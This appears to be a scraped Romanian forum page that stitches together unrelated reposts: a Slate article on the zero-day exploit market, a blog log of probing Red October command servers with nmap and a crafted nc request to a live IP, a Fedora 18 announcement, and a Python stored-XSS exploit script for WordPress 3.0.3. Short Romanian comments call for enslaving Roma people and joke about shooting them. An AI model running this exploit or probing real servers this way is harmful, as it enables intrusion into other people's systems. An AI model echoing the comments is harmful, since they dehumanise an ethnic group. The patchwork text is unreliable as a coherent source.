commanded $16,000; the highest, more than $250,000. Unlike other companies and sole traders operating in the zero-day trade, Desautels has adopted a policy to sell his exploits only domestically within the United States, rigorously vetting all those he deals with. If he didn’t have this principle, he says, he could sell to anyone he wanted—even Iran or China—because the field is unregulated. And that’s exactly why he is concerned. “As technology advances, the effect that zero-day exploits will have is going to become more physical and more real,” he says. “The software becomes a weapon. And if you don’t have controls and regulations around weapons, you’re really open to introducing chaos and problems.” Desautels says he knows of “greedy and irresponsible” people who “will sell to anybody,” to the extent that some exploits might be sold by the same hacker or broker to two separate governments not on friendly terms. This can feasibly lead to these countries unwittingly targeting each other’s computer networks with the same exploit, purchased from the same seller. “If I take a gun and ship it overseas to some guy in the Middle East and he uses it to go after American troops—it’s the same concept,” he says. The position Desautels has taken casts him as something of an outsider within his trade. France’s Vupen, one of the foremost gray-market zero-day sellers, takes a starkly different approach. Vupen develops and sells exploits to law enforcement and intelligence agencies across the world to help them intercept communications and conduct “offensive cyber security missions,” using what it describes as “extremely sophisticated codes” that “bypass all modern security protections and exploit mitigation technologies.” Vupen’s latest financial accounts show it reported revenue of about $1.2 million in 2011, an overwhelming majority of which (86 percent) was generated from exports outside France. Vupen says it will sell exploits to a list of more than 60 countries that are members or partners of NATO, provided these countries are not subject to any export sanctions. (This means Iran, North Korea, and Zimbabwe are blacklisted—but the likes of Kazakhstan, Bahrain, Morocco, and Russia are, in theory at least, prospective customers, as they are not subject to any sanctions at this time.) “As a European company, we exclusively work with our allies and partners to help them protect their democracies and citizens against threats and criminals,” says Chaouki Bekrar, Vupen’s CEO, in an email. He adds that even if a given country is not on a sanctions list, it doesn’t mean Vupen will automatically work with it, though he declines to name specific countries or continents where his firm does or does not have customers. Vupen’s policy of selling to a broad range of countries has attracted much controversy, sparking furious debate around zero-day sales, ethics, and the law. Chris Soghoian of the ACLU—a prominent privacy and security researcher who regularly spars with Vupen CEO Bekrar on Twitter—has accused Vupen of being “modern-day merchants of death” selling “the bullets for cyberwar.” “Just as the engines on an airplane enable the military to deliver a bomb that kills people, so too can a zero day be used to deliver a cyberweapon that causes physical harm or loss of life,” Soghoian says in an email. He is astounded that governments are “sitting on flaws” by purchasing zero-day exploits and keeping them secret. This ultimately entails “exposing their own citizens to espionage,” he says, because it means that the government knows about software vulnerabilities but is not telling the public about them. Some claim, however, that the zero-day issue is being overblown and politicized. “You don’t need a zero day to compromise the workstation of an executive, let alone an activist,” says Wim Remes, a security expert who manages information security for Ernst & Young. Others argue that the U.S. government in particular needs to purchase exploits to keep pace with what adversaries like China and Iran are doing. “If we’re going to have a military to defend ourselves, why would you disarm our military?” says Robert Graham at the Atlanta-based firm Errata Security. “If the government can’t buy exploits on the open market, they will just develop them themselves,” Graham says. He also fears that regulation of zero-day sales could lead to a crackdown on legitimate coding work. “Plus, digital arms don’t exist—it’s an analogy. They don’t kill people. Bad things really don’t happen with them.” * * * So are zero days really a danger? The overwhelming majority of compromises of computer systems happen because users failed to update software and patch vulnerabilities that are already known about. However, there are a handful of cases in which undisclosed vulnerabilities—that is, zero days—have been used to target organizations or individuals. It was a zero day, for instance, that was recently used by malicious hackers to compromise Microsoft’s Hotmail and steal emails and details of the victims' contacts. Last year, it was reported that a zero day was used to target a flaw in Internet Explorer and hijack Gmail accounts. Noted “offensive security” companies such as Italy’s Hacking Team and the England-based Gamma Group are among those to make use of zero-day exploits to help law enforcement agencies install advanced spyware on target computers—and both of these companies have been accused of supplying their technologies to countries with an authoritarian bent. Tracking and communications interception can have serious real-world consequences for dissidents in places like Iran, Syria, or the United Arab Emirates. In the wrong hands, it seems clear, zero days could do damage. This potential has been recognized in Europe, where Dutch politician Marietje Schaake has been crusading for groundbreaking new laws to curb the trade in what she calls “digital weapons.” Speaking on the phone from Strasbourg, France*, Schaake tells me she’s concerned about security exploits, particularly where they are being sold with the intent to help enable access to computers or mobile devices not authorized by the owner. She adds that she is considering pressing for the European Commission, the EU’s executive body, to bring in a whole new regulatory framework that would encompass the trade in zero days, perhaps by looking at incentives for companies or hackers to report vulnerabilities that they find. Such a move would likely be welcomed by the handful of organizations already working to encourage hackers and security researchers to responsibly disclose vulnerabilities they find instead of selling them on the black or gray markets. The Zero Day Initiative, based in Austin, Texas, has a team of about 2,700 researchers globally who submit vulnerabilities that are then passed on to software developers so they can be fixed. ZDI, operated by Hewlett-Packard, runs competitions in which hackers can compete for a pot of more than $100,000 in prize funds if they expose flaws. “We believe our program is focused on the greater good,” says Brian Gorenc, a senior security researcher who works with the ZDI. Yet for some hackers, disclosing vulnerabilities directly to developers lacks appeal because greater profits can usually always be made elsewhere. When I ask Vupen’s Bekrar what he thinks of responsible disclosure programs, he is critical of “lame” rewards on offer and predicts that for this reason an increasing number of skilled hackers in the future will “keep their research private to sell it to governments.” It may also be the case that, no matter what the financial incentive, for some it will always be more of a thrill to shun the “responsible.” So even if regulators internationally were to somehow curb exploit sales, it’s likely it would only have a tangible impact on legitimate companies like Vupen, Endgame, Netragard, and others. There would remain a burgeoning black market, in which vulnerabilities are sold off to the highest bidder. This market exists in an anarchic pocket of the Internet, a sort of Wild West, where legality is rarely of paramount importance—as former Washington Post reporter Brian Krebs recently found out for himself. Krebs, who regularly publishes scoops about zero days on his popular blog, has on several occasions been besieged by hackers after writing about vulnerabilities circulating on the black market. Krebs says his website came under attack last year after he exposed a zero day that was being sold on an exclusive, invite-only Web forum. “They don’t like the attention,” he says. The hackers were able to find Krebs’ home IP address. Then, they began targeting his Internet connection and taunting him. Krebs was eventually forced to change his router and has since signed up for a service that helps protect his online identity. But he says he still receives malware by email “all the time.” It’s difficult to imagine how the aggressive black market that Krebs encountered could ever be efficiently curtailed by laws. That is why the best way for vulnerabilities to be fully eliminated—or at least drastically reduced—would perhaps be to place a greater burden on the software developers to raise standards. If only developers would invest more in protecting user security by designing better, safer software and by swiftly patching security flaws, the zero-day marketplace would likely be hit by a crushing recession. At present, however, that remains an unlikely prospect. And unfortunately it seems there’s not a great deal you can do about it, other than to be aware of the risk. “Most organizations are one zero day away from compromise,” Krebs says. “If it’s a widely used piece of software, you’ve just got to assume these days that it’s got vulnerabilities that the software vendors don’t know about—but the bad guys do.” This article arises from Future Tense, a collaboration among Arizona State University, the New America Foundation, and Slate. Future Tense explores the ways emerging technologies affect society, policy, and culture. To read more, visit the Future Tense blog and the Future Tense home page. You can also follow us on Twitter. Sursa: Zero-day exploits: Should the hacker gray market be regulated? - Slate Magazine

The Hunt For Red October Posted on January 14, 2013 by infodox The Hunt For Red October – The Job So Far Today, Kaspersky Labs released a report on a long running advanced persistent threat* (APT) they had uncovered, revealing a long running cyber-espionage campaign targetting a broad and diverse mixture of both countries and sectors. As usual the fingers were pointed at China (Chinese exploit chains, Chinese hosts used…), however, there was also some evidence to implicate Russian involvement, which was speculated to be a “Fasle Flag” attempt. An associate of mine, after reading the report, came up with a SHODAN dork rather quickly to identify the C&C hosts. http://www.shodanhq.com/search?q=Last-Modified%3A+%27Tue%2C+21+Feb+2012+09%3A00%3A41+GMT%27+Apache After a few seconds, he realized that the etag header on all of them was the same, leading to the following query: http://www.shodanhq.com/?q=8c0bf6-ba-4b975a53906e4 SO, Fingerprinting information: just check for etag = 8c0bf6-ba-4b975a53906e4 The “offending IP’s” are as follows. These are used as proxies it appears. 31.41.45.119 37.235.54.48 188.40.19.244 141.101.239.225 46.30.41.112 188.72.218.213 31.41.45.9 So, we now have a list of 7 C&C hosts. Time to break out nmap and see what they are doing. The following scan string was used for an initial scan of all the hosts. sudo nmap -sSUV -A -O -vvv 3 -oA huntingredoctober 31.41.45.119 37.235.54.48 188.40.19.244 141.101.239.225 46.30.41.112 188.72.218.213 31.41.45.9 The tarball of report files is available here: huntingredoctober.tar The hosts identified as alive are as follows: 37.235.54.48 188.40.19.244 31.41.45.119 The other four were not responsive, probably taken down already. No fun. Once I had identified which hosts were, infact, still alive (while the rest of the bloody slow scan was running), I decided to see what lay behind the scenes on these hosts, doing the “daft” thing of connecting to port 80 using my web browser. The clench factor was rather intense as I half expected to be owned by about half a dozen super 0day exploits on crack while doing so. instead, I was redirected harmlessly to the BBC. The following HTML code was responsible for this redirect, which I thought was an incredibly clever way to hide their true purpose. <!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”> <html> <head> <title>BBC – Homepage</title> <meta http-equiv=”REFRESH” content=”0;url=http://www.bbc.com/”></HEAD> </HTML> Back to the nmap scan (it had FINALLY completed), the following was very interesting. PORT STATE SERVICE VERSION 80/tcp open http? |_http-title: BBC – Homepage | http-methods: GET HEAD POST OPTIONS TRACE | Potentially risky methods: TRACE |_See http://nmap.org/nsedoc/scripts/http-methods.html 138/udp open|filtered netbios-dgm 520/udp filtered route All of the servers looked like this. They all had those three ports – 80, 138, 520, open or filtered. The rest were all closed. The 188.40.19.244 host began sending me RST packets midway through my scan, but regardless, the work went on. I decided I was going to look at the webserver from informations kaspersky published. Sending GET requests to the /cgi-bin/ms/check CGI script produced a 500 internal server error, as did other CGI scripts. This was interesting in that they told me to email eaxample@example.com about it. I did so immediately, being a good netizen. Note the mispelling of example – “eaxample”. Emailing the big heckers. The email delivered Apparently the mail was delivered successfully, so I hope they reply soon with an explaination. On to more serious things, another analyst working with me uncovered another interesting thing. He went and did the following: printf “POST /cgi-bin/nt/th HTTP/1.1\r\nHost: 37.235.54.48\r\nContent-Length: 10000\r\n\r\n%s” `perl -e ‘print “A” x 20000)’` | torsocks nc 37.235.54.48 80 Now, he had figured out the page would 500, unless a content length was set. So, he set a long Content Length, and sent an even longer POST request. The result was nothing short of fascinating. HTTP/1.1 200 OK Date: Mon, 14 Jan 2013 19:18:07 GMT Server: Apache Content-length: 0 Content-Type: text/html HTTP/1.1 414 Request-URI Too Large Date: Mon, 14 Jan 2013 19:18:08 GMT Server: Apache Content-Length: 250 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC “-//IETF//DTD HTML 2.0//EN”> <html><head> <title>414 Request-URI Too Large</title> </head><body> <h1>Request-URI Too Large</h1> <p>The requested URL’s length exceeds the capacity limit for this server.<br /> </p> </body></html> “Look mom! Two headers!”. Seriously, this is interesting. First it gives a 200 OK, then a second later something else says “LOL, NO”. The delay makes us think the proxy is saying “OK”, then the real C&C is complaining. The fact it complains about a request URL, and the length being in the POST request, makes me think the final data-to-C&C might be sent as a GET. Just a theory. — TO BE CONTINUED — // This post suffered a bad case of myself and fellow researchers having a lulz about it, and my cat straying onto my keyboard. It is a work in progress. — Continuing the hunt — Today we retrieved new intelligence (or rather, last night, but I could not act on this intel) from HD Moore of Metasploit project that more C&C servers had been located. The following link is the list of IP addresses. http://pastie.org/private/ytbrfmqpn8alfjfrnbhcbw So, it was decided (once the cat had gotten the hell off my keyboard) to investigate this list. @craiu provided us with the tip “check out “1c824e-ba-4bcd8c8b36340? and “186-1333538825000? too.”, so we will act upon this later. I decided, seeing as my internet went down for a while, to test out my Python skillz, and whipped up a quick program I named “SONAR”, which simply attempted a TCP connection to port 80 on the suspected C&C servers and logged responsive ones to a file. Source code attached. sonar.tar Sonar... I could have used nmap, but that would have been unimaginative and, frankly, no fun. And who says hunting cyber-spies (So much worse than normal spies, ‘cos they got the dreaded CYBER in there) is not supposed to be bloody fun anyway, not me for certain! We quickly reduced the list to a “lot less than we had”, and I qued them up for nmap scanning, which has yet to be done, as the sysadmins on the network I am using do not like when I portscan things for some odd reason. Or when I use SSH, or email. Anyway, I digress. So far, more C&C servers had been identified, and more “Fingerprinting” methods had been developed. I am considering writing a patch to sonar.py to dump out the etag data along with working IP’s, but that can wait til later. A simple HTTP GET / should do the trick, with a few regex’s. We also obtained a list of MD5 hashes from malware.lu showing samples of Red October they have in their repo – see here -> 053d92ba6413ea31af9898e7d57692b68e42117a61b2d6de4556e9b707314fd7 16d5114b8613f9 - Pastebin.com so those were qued up for downloading (once on a non monitored by college network) for some analysis using IDA. That is to be tonights job – a quick and dirty first pass run of analysing these things. * For the record, I think APT is another FUD term… But oh well, it has become “a thing”. Sursa: The Hunt For Red October | Insecurety Research

Fedora 18 released [TABLE] [TR] [TD]From:[/TD] [TD][/TD] [TD]Robyn Bergeron <rbergero-AT-redhat.com>[/TD] [/TR] [TR] [TD]To:[/TD] [TD][/TD] [TD]announce-AT-lists.fedoraproject.org[/TD] [/TR] [TR] [TD]Subject:[/TD] [TD][/TD] [TD]Announcing the release of Fedora 18.[/TD] [/TR] [TR] [TD]Date:[/TD] [TD][/TD] [TD]Tue, 15 Jan 2013 10:03:18 -0500 (EST)[/TD] [/TR] [/TABLE] The Fedora Project is incredibly delighted to announce the release of Fedora 18 ("Spherical Cow"). Heck, we'd even say that getting this release to you has been a mooving experience. Fedora is a leading-edge, free and open source operating system that continues to deliver innovative features to many users, with a new release about every six months...or so. But no bull: Spherical Cow, is of course, Fedora's best release yet. You'll go through the hoof when you hear about the Grade A Prime F18 features. You can always cownt on us to bring you the best features first. Can't wait for a taste? You can get started downloading now: http://fedoraproject.org/get-fedora Detailed information about this release can be seen in the release notes: http://docs.fedoraproject.org/en-US/Fedora/18/html/Releas... == What's New in Fedora 18? == The Fedora Project takes great pride in being able to show off features for all types of use cases, including traditional desktop users, systems administration, development, the cloud, and many more. But a few new features are guaranteed to be seen by nearly anyone installing Fedora and are improvements that deserve to be called out on their own. The user interface for Fedora's installation software, Anaconda, has been completely re-written from the ground up. Making its debut in Fedora 18, the new UI introduces major improvements to the installation experience. It uses a hub-and-spoke model that makes installation easier for new users, offering them concise explanations about their choices. Advanced users and system administrators are of course still able to take advantage of more complex options. The general look and feel of the installation experience has been vastly upgraded, providing modern, clean, and comprehensible visuals during the process. While the new installer should work well for most users in most configurations, there are inevitably a few teething problems in the first release of such a major revision. Known design limitations of the new installer in F18 are listed here: http://fedoraproject.org/wiki/Anaconda/NewInstaller Known significant bugs can be seen here: http://fedoraproject.org/wiki/Common_F18_bugs#Installatio... We welcome your constructive and specific feedback as we continue to work on refining the installer for future releases. The upgrade process for Fedora now uses a new tool called FedUp (Fedora Upgrader). FedUp replaces pre-upgrade as well as the DVD methods for upgrading that have been used in previous Fedora releases. FedUp integrates with systemd to enable the upgrade functionality, doing the work in a pristine boot environment. Of course, it wouldn't be a release announcement without a spotted -- er, dotted -- list of all the other fantastic features you'll see in Fedora 18: === For desktop users === Moooove over, stale desktops. We've got a small herd of choices udderly suited to your preferences. * GNOME 3.6: The newest version of the GNOME desktop provides an enhanced Messaging Tray, support for Microsoft Exchange and Skydrive, and many more new features. * Cinnamon: Fedora users now have the option of using Cinnamon, an advanced desktop environment based on GNOME 3. Cinnamon takes advantage of advanced features provided by the GNOME backend while providing users with a more traditional desktop experience. * MATE Desktop: The MATE desktop provides users with a classic GNOME 2.x style user interface. This desktop is perfect for users who have been running GNOME Classic or other window managers like XFCE as an alternative to GNOME 3. * KDE Plasma Workspaces 4.9: KDE Plasma Workspaces has been updated with many new features and improved stability and performance, including updates to the Dolphin File Manager, Konsole, and KWin Window manager. * Xfce 4.10: The lightweight and easy-to-use Xfce desktop has been updated to the 4.10 version with many bug fixes and enhancements, including a new MIME type editor, a reworked xfce4-run dialog, improved mouse settings, tabs in the Thunar file manager, and options to tile windows in xfwm4. Through all of these and more, Xfce continues to improve without getting in your way. Regardless of your desktop choice, Fedora 18 offers... * Improved storage management: SSM (System Storage Manager) is an easy-to-use command-line interface tool that presents a unified view of storage management tools. Devices, storage pools, volumes, and snapshots can now be managed with one tool, with the same syntax for managing all of your storage. (It's great for systems administrators, too!) === For developers === For developers there are all sorts of moo-tivating goodies: * Fresh versions of programming languages: Using Perl, Rails, or Python? All three of these languages are updated in Fedora 18. We've got Rails 3.2, Python 3.3, and Perl 5.16 fresh off the farm. * Clojure gets more love with the addition of tooling packages, including the Leinengen build tool, as well as Clojure libraries and frameworks, including Korma and Noir. * DragonEgg connects GCC and LLVM: DragonEgg is a plugin for the GCC compilers to allow use of the LLVM optimization and code-generation framework. DragonEgg provides software developers with more optimization and code-generation options for use with the GCC compilers. DragonEgg also allows GCC to be used for cross-compilation to target architectures supported by LLVM without requiring any special cross-compilation compiler packages. Fedora continues to develop and use GCC as the standard default compiler. === For systems administrators === Keep track of your infrastructure herds with these new features: * Offline system updates: Systems can now be updated offline, allowing for a more stable update of critical system components. This functionality is only integrated with GNOME Desktop Environment in this release but uses the distribution neutral PackageKit and systemd API's and hence can be made available for other desktop environments as well based on the interest from upstream developers. * Storage enhancements: StorageManagement is a collection of tools and libraries for managing storage area networks (SAN) and network attached storage (NAS). * Samba 4: This popular suite of tools has long provided file- and print-sharing services in heterogeneous operating system environments. The long-awaited Samba 4 introduces the first free and open source implementation of Active Directory protocols and includes a new scripting interface, allowing Python programs to interface to Samba's internals. * Riak: A fault-tolerant key-value store, Riak provides easy operations and predictable scaling as a NoSQL database. === For clouds and virtualization === Do you spend your days <strike>grazing</strike> gazing into the clouds? Here's just a taste of some of the cloud and virt features you'll see in Fedora 18: * Eucalyptus makes its first appearance in Fedora, with their 3.2 release included in F18. This platform for on-premise (private) Infrastructure-as-a-Service clouds uses existing infrastructure to create scalable and secure AWS-compatible cloud resources for compute, network, and storage. * OpenStack: With the Folsom release in Fedora 18, OpenStack continues to have the newest releases in Fedora. This open source cloud computing platform enables users to deploy their own cloud infrastructures for private or public cloud deployments. Heat, an incubated OpenStack project, is also available in F18, providing an API that enables the orchestration of cloud applications using file or web based templates. * oVirt Engine: The management application for the oVirt virtualization platform, oVirt Engine, is updated to the newest version, 3.1. This release includes extensive new features, including support for live snapshots, cloning virtual machines from snapshots, quotas, and more. * Suspend and resume support for virt guests: Virtual machines get love with this feature, enabling the ability to suspend and resume guests, with the close of a laptop lid or menu option or via the command line. And that's only the beginning. For a more complete list with details of all the new features in Fedora 18, steer over to: http://fedoraproject.org/wiki/Releases/18/FeatureList == Downloads, upgrades, documentation, and common bugs == The steaks are high--don't miss out on installing the best version of Fedora yet! Get it now: http://get.fedoraproject.org/ If you are upgrading from a previous release of Fedora, refer to: http://fedoraproject.org/wiki/Upgrading Fedora has replaced pre-upgrade with FedUp (excuse the pun.. or don't), a more robust solution, and pushed several bug fixes to older releases of Fedora to enable an easy upgrade to Fedora 18. Graze...er, gaze...upon the full release notes for Fedora 18, guides for several languages, and learn about known bugs and how to report new ones, here: http://docs.fedoraproject.org/ With all the changes to the installer, we particularly recommend reading the Installation Guide: http://docs.fedoraproject.org/en-US/Fedora/18/html/Instal... Everyone makes missteaks. Fedora 18 common bugs are documented at: http://fedoraproject.org/wiki/Common_F18_bugs This page includes information on several known bugs in the installer, so we recommend reading it before installing Fedora 18. == Fedora Spins == Fedora spins are alternate versions of Fedora tailored for various types of users via hand-picked application set or customizations, from desktop options to spins for those interested in gaming, robotics, or design software. More information on our various spins is available at: http://spins.fedoraproject.org == Contributing == There are many ways to contribute beyond bug reporting. You can help translate software and content, test and give feedback on software updates, write and edit documentation, design and do artwork, help with all sorts of promotional activities, and package free software for use by millions of Fedora users worldwide. To get started, visit http://join.fedoraproject.org today! == Fedora 19 == Even as we continue to provide updates with enhancements and bug fixes to improve the Fedora number experience, our next release, Fedora 19, is already being developed in parallel and has been open for active development for several months already. We have an early plan for release at the end of May 2013, and the final schedule for F19 is going to be based on the results of the planning process: https://fedoraproject.org/wiki/Releases/19/Schedule == Feature Deprecation == Fedora has always been full of great features, but sometimes we need to cull the herd. Saying good-bye is always hard, but here are the ones we had to put out to pasture this time around. * /etc/sysconfig Deprecations: Several system configurations have moved out of /etc/sysconfig. The goal of these changes is to reduce - as described in http://0pointer.de/blog/projects/the-new-configuration-fi... - the unnecessary differences between Linux distributions and share a standard location for common settings. For a full list of changes read the release notes. http://docs.fedoraproject.org/en-US/Fedora/18/html/Releas... == Contact information == If you are a journalist or reporter, you can find additional information here: https://fedoraproject.org/wiki/Press Enjoy! -Robyn Bergeron Sursa: Fedora 18 released [LWN.net]

Buna idee, nu trebuie omorati, trebuie facuti sclavi.

Eu oricum nu inteleg. Omul acela oferea 300 RON tigancilor care se castrau. Ce lege a incalcat? De ce e arestat? Ca nu le dadea bon fiscal?

+ Oare o stii sa booteze de pe mini-USB?

[h=2]Wordpress 3.0.3 Stored XSS Exploit[/h] #Exploit Title: Wordpress 3.0.3 Stored XSS exploit (IE7,6 NS8.1) [Revised] #Date: 14/01/2013 #Exploit Author: D35m0nd142 #Vendor Homepage: http://wordpress.org #Version: 3.0.3 #Special thanks to Saif #configuration is reconfigurable according to your own parameters. #!/usr/bin/python import sys,os,time,socket os.system("clear") print "-------------------------------------------------" print " Wordpress 3.0.3 Stored XSS exploit " print " Usage : ./exploit.py <wp website> <text> " print " Created by D35m0nd142 " print "-------------------------------------------------\n" time.sleep(1.5) wp_site = sys.argv[1] text = sys.argv[2] try: sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((sys.argv[1],80)) request = "_wpnonce=aad1243dc1&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message% 3D1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http%3A%2F%2F" request += sys.argv[1] request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&_wp_original_http_referer=http%3A%2F%2F" request += sys.argv[1] request += "%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category%5B%5D=0&post_category%5B%5D=1&tax_input%5Bpost_tag%5D=&newtag%5Bpost_tag%5D=&post_title=&samplepermalinknonce=ffcbf222eb&content=%3CIMG+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&excerpt=&trackback_url=&meta%5B108%5D%5Bkey%5D=_edit_last&_ajax_nonce=257f6f6ad9&meta%5B108%5D%5Bvalue%5D=3&meta%5B111%5D%5Bkey%5D=_edit_lock&_ajax_nonce=257f6f6ad9&meta%5B111%5D%5Bvalue%5D=1293465765&meta%5B116%5D%5Bkey%5D=_encloseme&_ajax_nonce=257f6f6ad9&meta%5B116%5D%5Bvalue%5D=1&meta%5B110%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta%5B110%5D%5Bvalue%5D=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145" print "--------------------------------------------------------------------------------------------------------------------------------------" print request print "--------------------------------------------------------------------------------------------------------------------------------------\n" length = len(request) poc = "<IMG STYLE='xss:expression(alert('%s'))'>'" %text print "Trying to execute attack on the remote system . . \nPOC: \n %s\n" %poc time.sleep(0.7) print "Sending %s bytes of data . . " % length time.sleep(2) sock.send("POST /wordpress/wp-admin/post.php HTTP/1.1\r\n") sock.send("Host: " + wp_site+"\r\n") sock.send("User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)\r\n") sock.send("Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n") sock.send("Accept-Language: en-us,en;q=0.5\r\n") sock.send("Accept-Encoding: gzip,deflate\r\n") sock.send("Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n") sock.send("Keep-Alive: 300\r\n") sock.send("Proxy-Connection: keep-alive\r\n") sock.send("Referer:http://"+wp_site+"/wordpress/wp-admin/post.php?post=145&action=edit&message=1\r\n") #You can change the number of the variable 'post' sock.send("Cookie:wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;wp-settings- time-1=1293196695; wp-settings-time-2=1293197912;wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq\r\n") sock.send("Content-Type: application/x-www-form-urlencoded\r\n") sock.send("Content-Length:%d\n" %length) sock.send(request+"\r\n\r\n") print sock.recv(1024) print "\n[+] Exploit sent with success . Verify manually if the website has been exploited \n" except: print "[!] Error in your configuration or website not vulnerable \n" # 99F5C0A5380593CB 1337day.com [2013-01-15] 06CE9157954A5ED6 # Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

300 RON/femeie? Sunt mai ieftine gloantele.